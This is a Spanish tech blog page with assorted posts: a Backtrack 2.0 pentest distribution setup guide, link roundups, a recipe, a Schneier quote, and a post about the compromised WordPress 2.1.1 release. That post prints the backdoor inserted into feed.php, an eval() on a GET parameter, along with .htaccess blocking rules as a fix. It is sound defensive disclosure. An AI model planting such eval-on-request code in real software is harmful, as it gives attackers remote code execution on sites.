distribuciones/hacking/novedades

Los primeros pasos con Backtrack 2.0

Publicado en por Josemaría / 36 comentarios

icono distintivo de los textos de hackingLa semana pasada vio la luz la versión final de Backtrack 2.0, una distribución de GNU/Linux basada en Slackware y centrada en servir como soporte para realizar tests de penetración. No es una distribución fácil orientada a novatos. Su principal valor reside en que trae instaladas y perfectamente configuradas más de 300 aplicaciones diferentes perfectamente clasificadas en categorías (escalado de privilegios, escaneo de vulnerabilidades, escaneos de red…) tanto nativas del mundo Linux como aplicaciones windows listas para ser usadas a través de wine. Al margen de esto (que no es poco, cuidado, supone semanas de trabajo y mucha experiencia preparar un entorno de trabajo similar a este) que nadie se espere tutoriales ni asistentes específicos para usar las herramientas (a no ser que los traigan ellas mismas «de serie») ni tan siquiera una indicación de cual debemos usar en casa situación. Eso depende de nosotros.

Para quien quiera experimentar con ella lo primero que hay que hacer es bajarse la iso (cerca de 700 Megas). A partir de aquí tenemos dos opciones: quemar un CD con esta imagen o configurar una máquina virtual para usarla desde nuestro actual sistema. Si elegimos la primera opción tendremos como resultado un LiveCD que, una vez arrancado, nos permitirá usar todas sus herramientas. También tendremos la opción de instalarlo localmente y ni que decir tiene que si nuestro interés en ella no es meramente temporal es conveniente que lo hagamos para no perder las actualizaciones y personalizaciones que realicemos.

Para la segunda opción (crear una máquina virtual) y si vamos a usar vmplayer basta con que utilicemos la imagen que nos hemos bajado como uno de los CD’s en la definición de la máquina virtual que vamos a crear. Salvo que nos dediquemos a esto profesionalmente y/o podamos dedicar un portatil de forma exclusiva para ella creo que es la mejor opción. Para crear dicha definición podemos partir de una ya existente, usar EasyVMX o, para los más perezosos, bajarse este zip con la que yo he preparado. En este último caso basta con que desempaqueteis el contenido del zip en el mismo directorio donde os hayais bajado la imagen iso y que tengais en cuenta que el nombre de la misma debe de coincidir con el del parámetro ide1:1.fileName del fichero backtrack.vmx (en mi caso bt2final.iso).

Pantallazo inicial de backtrack 2.0

Si todo va bien Backtrack arranca y muestra el pantallazo de la imagen anterior en el que nos muestra las credenciales necesarias para hacer login como root de la máquina y algunos comandos útiles. Las herramientas que funcionan en modo texto (nmap, netdiscover, aircraft, etc.) están disponibles y listas para funcionar desde ya. Para otras tendremos que usar uno de los dos entornos gráficos disponibles: kde o fluxbox. Las herramientas, como podemos ver en este segundo detalle, están perfectamente clasificadas según su orientación:

Pantallazo de backtrack 2.0 con kde

Si hemos usado una máquina virtual para echarle un vistazo pero queremos gozar de las ventajas de una instalación local el siguiente paso es, lógicamente, instalarlo. La definición de la máquina que os he enlazado antes consta de un disco de 4 GB sin particionar, así que lo primero que tenemos que hacer es crear una partición para hacer la instalación. La distribución trae qtparted (aunque no aparece en ninguno de los menús) así que quien le tenga alergia a la línea de comandos no tiene excusas.

Pantallazo de qtparted en backtrack 2.0

A continuación realizamos la instalación (kde -> system -> Backtrack installer) dónde sólo hay que indicar el cdrom de origen, el disco de destino y el tipo de instalación.

Pantallazo de la instalación de backtrack 2.0

Una vez hecha la instalación reiniciamos la máquina para que arranque ya desde este disco duro tan virtual como nuestra máquina, pero antes de hacerlo y si hemos elegido la opción de instalación completa, podemos liberar el espacio de la imagen iso que ya no es necesaria borrando el archivo correspondiente y comentado o eliminando las líneas que lo referencian en el archivo .vmx:

# Settings for the optional virtual CDROM, ISO-image
#ide1:1.present = "TRUE"
#ide1:1.fileName = "bt2final.iso"
#ide1:1.deviceType = "cdrom-image"
#ide1:1.mode = "persistent"
#ide1:1.startConnected = "TRUE"

Y listo. Ahora queda la parte difícil: aprender a usar las herramientas y a saber elegir cual es la más adecuada según la ocasión. Pero esto es ya cosa vuestra. Suerte.

resúmenes semanales

Retazos de la semana (y XV)

Publicado en por Josemaría / 1 comentario

icono para resúmenes semanales

  • Esto de las redes sociales llega a las recetas de cocina. Pues claro que si hombre… Tanto compartir frikadas con los colegas ¿Y qué pasa con los potajes? Para esto ha nacido Cheeef y lo pregonan desde Tecnochica.
  • Mientras Dell sigue deshojando la margarita… HP también está considerando ofrecer portátiles con Linux preinstalado. A ver si alguno de ambos se anima aunque sólo sea por ganarle la mano al otro 😉
  • Varsavsky sigue recibiendo inversiones para fon. Lo cuenta él mismo en su blog. Yo creo que lo que va siendo hora es de que alguien cuente lo mucho que le facilita la vida fon. ¿Existen? No se, algún testimonio de alguien que cuente que encuentra un router fon disponible allá dónde lo necesita, que está ganando dinero revendiendo su conexión… resultados, vaya.
  • Windows Live OneCare sigue recibiendo premios. En este caso tiene el dudoso honor de ser considerado como el antivirus con los peores resultados de entre los 17 comparados por la empresa AV Comparatives. Teneis el resumen del estudio aquí y un PDF con el report completo aquí. Y lo he visto en Diario TI a través de JavaRealMachine.
  • Publica tus PDF’s online. Scribd es una suerte de youtube para documentos online: te permite compartirlos, etiquetarlos y hacerlos disponibles desde tu blog mediante su reproductor embebido.
  • ¿Te leen los chinos?. Lo más seguro es que no… pero la pregunta está mal formulada. En realidad quería decir que si los chinos tuvieran algún interés en leerte ¿podrían hacerlo? Pues ahora puedes comprobarlo desde esta página a la que he llegado a través de Camera Obscura. Y no, a mi no pueden leerme 🙁
  • Skype ofrece llamadas con tarificación especial. Ala, ya tenemos otro chiringuito para montar servicios de pornografía de pago… Que si, que si, que seguro que tiene utilidad para otras cosas (para votar a los niñatos de Operación Triunfo, expulsar a los gandules de Gran Hermano)… incluso alguna seria, pero vamos, ya sabemos dónde está el negocio en estas cosas. Lo han llamado Skype Prime, por el momento sólo funciona con el cliente de skype para windows, está en fase beta (¡cómo no!) y lo he visto en Error500.
  • Vivir del blog. El señor John Chow «levantó» algo más de 7.000 dolares con su blog durante el mes de febrero. Y eso que sólo tiene 28 días… ¡habrá que ver lo que saca este marzo! Eso si, su blog más bien parece un intermedio de House de tanta publicidad. Visto en El Catalejo.
apple/humor/publicidad

Mac’s vs. PC’s

Publicado en por Josemaría / 1 comentario

icono para textos con buen humorDivertida campaña publicitaria que compara PC’s y Mac’s mediante actores y situaciones bastante habituales. Como por ejemplo, la seguridad:

El resto (virus, networking, upgrades, etc.) lo puedes ver en el lugar de dónde ha salido este.

ACTUALIZACI?N: En youtube hay una barbaridad de variantes y parodias de esta campaña… por ejemplo la versión japonesa del anterior:


ACTUALIZACI?N (y II): La campaña en castellano.

estadísticas

Matar no sale tan caro

Publicado en por Josemaría / 5 comentarios

icono para opiniones, política y demás sollozosWorldmapper es una web muy educativa. Recoge una amplia colección de mapas dónde la superficie de las distintas naciones está alterada en función del dato observado en cada uno de ellos. Los mapas se acompañan de los datos técnicos usados para el estudio así como de las hojas de cálculo usadas como base para la generación de los mismos.

Como ejemplo ilustrativo podeis echarle un vistazo a estos dos a ver si adivinais que representan (el título de la entrada es una pista ¿eh?):

Gasto militar en el mundo
Muertos en conflictos militares en el mundo

¿Os rendis? El primero de ellos muestra el gasto militar durante en el año 2002 estimado en 789 billones de dolares de los cuales 353, el 45% del total, corresponde a los EE.UU. El segundo mapa muestra los muertos en conflictos bélicos en todo el mundo durante ese mismo año 2002: unos 172.000 en total repartidos entre 80 naciones de las cuales nueve de ellas acaparan el 70% del total: la República Democrática del Congo (con un 26%), seguida de la Federación Rusa, Sudán, Indonesia, Colombia, Burundi, Somalia, Uganda y Afghanistán. Curiosamente el gasto militar de estas nueve naciones es de sólo 20,2 billones de dolares (un 2,5% del total mundial de los cuales un 1,76% corresponde a la Federación Rusa).

Triste moraleja: no hace falta gastar tanto dinero para matarse…

Visto en docencia.es.

recetas de cocina

Garbanzos con bacalao

Publicado en por Josemaría / 12 comentarios

icono distintivo de los textos de recetas de cocinaNo soy católico pero me gustan las tradiciones siempre y cuando no sean dañinas y nos reporten algún beneficio aunque sea sólo disfrutar de un poco de sana nostalgia, así que aprovechando que estamos en época de Cuaresma voy a rescatar la olvidada sección de recetas de cocina con uno de los muchos y exquisitos guisos tradicionales de viernes de cuaresma: los garbanzos con bacalao.

  • 500 grs. de garbanzos.
  • 500 grs. de lomos de bacalao.
  • 1 cabeza de ajo.
  • 1 cebolla.
  • 2 pimientos verdes.
  • 1 tomate maduro.
  • 1 zanahoria
  • un par de hojas de laurel.
  • 1 apio.
  • 1 cucharadita de pimentón dulce.
  • un poco de perejil fresco.
  • unas briznas de azafrán.
  • 2 clavos
  • una pizca de comino.
  • agua, sal y aceite de oliva.

El bacalao se desala durante unas 24 horas cambiándolo de agua unas tres o cuatro veces a lo largo del día. Los garbanzos se dejan también en agua con un poco de sal la noche antes de hacer el guiso. Hay quien dice que es mejor remojar los garbanzos en el mismo recipiente que el bacalao y que así van cogiendo sabor pero, de hacerlo así, que sea en un recipiente con suficiente capacidad como para que cuando los garbanzos empiecen a hincharse no se queden sin agua.

En una olla exprés echamos los garbanzos, la cabeza de ajos entera, la cebolla, el tomate, el apio, la zanahoria y los pimientos cortados a trozos, las hojas de laurel y un chorrito de aceite de oliva. Cuando arranca a hervir tapamos la olla y dejamos cocer durante unos 20 minutos. Luego incorporamos los clavos, el comino, el pimentón dulce, el azafrán desleido en un poco de agua y el bacalao. A partir de este momento hemos de tener cuidado con no desbaratar los lomos de bacalao (aunque hay quien lo prefiere desmigado). Cocemos, ahora a olla abierta, durante otros 20 minutos aproximadamente y probamos el guiso antes de ajustar la sal sin extrañarnos demasiado si ni siquiera es necesario echarle. Después de unos cinco minutos más (o un poco más si vemos que los garbanzos no están aun a nuestro gusto), echamos el perejil fresco bien picado y retiramos el guiso del fuego para dejarlo reposar.

seguridad

La psicología de la seguridad

Publicado en por Josemaría / 0 comentarios

icono textos sobre seguridad

In the past, I’ve criticized palliative security measures that only make people feel more secure as «security theater.» But used correctly, they can be a way of raising our feeling of security to more closely match the reality of security. One example is the tamper-proof packaging that started to appear on over-the-counter drugs in the 1980s, after a few highly publicized random poisonings. As a countermeasure, it didn’t make much sense. It’s easy to poison many foods and over-the-counter medicines right through the seal–with a syringe, for example–or to open and reseal the package well enough that an unwary consumer won’t detect it. But the tamper-resistant packaging brought people’s perceptions of the risk more in line with the actual risk: minimal. And for that reason the change was worth it.

The Psychology of Security, un interesante ensayo de Bruce Schneier.

ACTUALIZACI?N: Traducido al castellano en seguridad digital.

seguridad/wordpress

Actualización de seguridad para WordPress 2.1.1

Publicado en por Josemaría / 0 comentarios

icono de wordpressSi has descargado e instalado la versión 2.1.1 de wordpress durante la última semana que sepas que tienes un pequeño problema que resolver. Algo así es lo que dicen en su blog oficial. Por lo visto un cracker ha tenido acceso al código de esta versión durante los últimos días y ha introducido en el mismo unas líneas que permiten la ejecución arbitraria de código de forma remota, concretamente en los ficheros feed.php y theme.php.

Para los curiosos, en buayacorp nos muestran el código introducido en el fichero feed.php:

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

La solución pasa por dar la mayor difusión a la noticia (para los despistados que no lean las notas que wordpress publica en su tablero inicial), actualizar lo antes posible a la nueva versión 2.1.2 que corrige este y, «poyaque» estamos, otros problemas o si no te es posible esto último usar la solución alternativa que sugieren en el blog de dreamhost e introducir las siguientes reglas de bloqueo en el fichero .htaccess de tu apache:

< Files theme.php >
order allow,deny
deny from all
< /Files >

< Files feed.php >
order allow,deny
deny from all
< /Files >

resúmenes semanales

Retazos de la semana (y XIV)

Publicado en por Josemaría / 0 comentarios

icono para resúmenes semanalesLa semana no ha dado para mucho, la verdad. Al menos para mi. Pero para no perder la costumbre hay van las cosas más interesantes que he marcado en mis favoritos durante estos últimos siete días:

  • Show us the code :\> Iniciativa que parte de una carta abierta a Steve Ballmer. ¿Que Linux viola la propiedad intelectual de Microsoft? No pasa nada: que digan dónde y se cambia…
  • ¿Preinstalará Dell Linux en sus equipos o no? A principio de semana era que si. Luego parece que la cosa quedó en que no… ¡Pero que estrés!
  • Ya hay un keygen para el código de activación de windows Vista. O eso es lo que dicen… Yo, la verdad, no tengo mucho interés por el momento pero a quien le interese aquí tiene el hilo del foro dónde se encuentra el presunto generador de claves (para acceder al foro es preciso registro previo). Pues no, parece que todo era una broma..
  • 20 minutos suprime los anuncios de prostitución. Y, por el momento, parece ser el único periódico que prescindirá de este suculento biberón. Ni el ABC, ni La Razón (por decir dos de los más cercanos a «Dios Nuestro Señor», vamos) ni ningún otro. En fin…
  • Un gusano en Solaris Sin consecuencias, pero ahí está. Detalles aquí.
  • HotSpots Wifi. Hotspotr es un proyecto basado en Google Maps para marcar los puntos de acceso wifi gratuitos o de pago. Por el momento no parece tener mucho éxito en Europa (y menos en nuestro país), pero habrá que seguirlo a ver que tal.
  • ¿Otro pseudo-Digg más?. O tal vez no sea sólo eso… coRank tiene características que lo hacen algo distinto a los demás. Lo explican muy bien en Error500. Ricardo Galli, autor de Menéame, también opina sobre este nuevo servicio.

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información

ACEPTAR
Aviso de cookies